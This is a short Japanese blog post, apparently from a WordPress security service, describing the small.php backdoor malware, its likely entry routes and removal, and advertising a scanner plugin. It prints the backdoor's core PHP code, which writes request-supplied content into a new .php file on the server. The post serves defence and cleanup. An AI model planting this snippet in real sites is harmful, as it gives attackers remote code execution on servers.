昨今拡大しているマルウェアであるsmall.phpについて解説いたします。

ワードプレスのサーバーの様々なフォルダに作成されるsmall.php

このマルウェアは、サーバー上のあらゆるフォルダにsmall.phpというファイル名で、バックドアを生成いたします。ワードプレスサイトのデータがあるpublic htmlより上のフォルダにも作成されている場合がございます。

コードの例は下記のようなものとなっており非常に単純です。

$f = fopen('ランダムな文字'.'.php',"w");
fputs($f,$_REQUEST['ランダムな文字']);
fclose($f);

インターネット経由で送られたプログラムをランダムな文字列の名称でサーバー内に作成して保存するバックドアと呼ばれる種類のマルウェアです。

small.phpはどこから埋め込まれた?

このファイルがサーバー上に生成されているということは、ワードプレスの脆弱性のあるプラグインを利用してハッキングされたか、管理者権限を奪取されて書き込まれたか、ほかのバックドア経由で書き込まれた可能性が高いです。

small.phpの対処方法

ワードプレスのファイルには、一般的にはsmall.phpというファイルはございません。
このため、ワードプレスのフォルダー内のどこかに、small.phpというものがございましたら、マルウェアを疑ってもよいかと存じます。

また、ワードプレスがあるフォルダより上のフォルダにまでこのファイルが多数書き込まれている事例がございます。このファイルは外部アクセスすらできませんのでマルウェアであればすぐに削除されることをお勧めいたします。

また、
【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
にてSmall.phpマルウェアを検出・駆除可能です。

WordPress ワードプレスのマルウェア駆除・セキュリティー対策のご依頼ご相談はワードプレスドクターまでお気軽にお送りください